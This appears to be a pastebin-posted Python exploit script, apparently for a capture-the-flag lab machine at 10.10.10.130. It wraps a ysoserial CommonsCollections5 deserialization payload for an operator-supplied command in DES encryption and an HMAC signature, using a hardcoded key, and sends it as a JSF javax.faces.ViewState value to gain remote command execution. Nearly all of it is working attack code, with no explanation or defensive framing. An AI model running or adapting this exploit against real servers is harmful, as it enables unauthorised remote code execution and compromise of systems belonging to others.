· 6 years ago · Jul 19, 2019, 05:14 PM
1import sys
2import os
3import base64
4import binascii
5import hmac
6import urllib
7import pyDes
8import requests
9from hashlib import sha1
10
11payloads = ['CommonsCollections5']
12secret_key = base64.b64decode("SnNGOTg3Ni0=")
13
14def hmac_signature(secret, string):
15 hashed = hmac.new(secret,string,sha1)
16 return hashed.hexdigest()
17def encrypter(key, text):
18 d = pyDes.des(key,pyDes.ECB)
19 cipher_text = d.encrypt(text,padmode=pyDes.PAD_PKCS5)
20 return cipher_text
21def generate(cmd):
22 for payload in payloads:
23 command = os.popen('java -jar ysoserial.jar ' + payload + ' "' + cmd + '"')
24 result = command.read()
25 command.close()
26 DESEncrypted = encrypter(secret_key, result)
27 hmac_digest = hmac_signature(secret_key, DESEncrypted)
28 encoded = DESEncrypted + binascii.unhexlify(hmac_digest)
29 b64_encrypted_payload = base64.b64encode(encoded)
30 print("\n[*]Sending payload to server...\n")
31 r = requests.post("http://10.10.10.130:8080/userSubscribe.faces", data = {'javax.faces.ViewState':b64_encrypted_payload})
32
33if len(sys.argv) !=2:
34 print("usage = python script.py COMMAND")
35 print("e.g., python script.py 'ping -n 8 10.10.14.1'")
36else:
37 generate(sys.argv[1])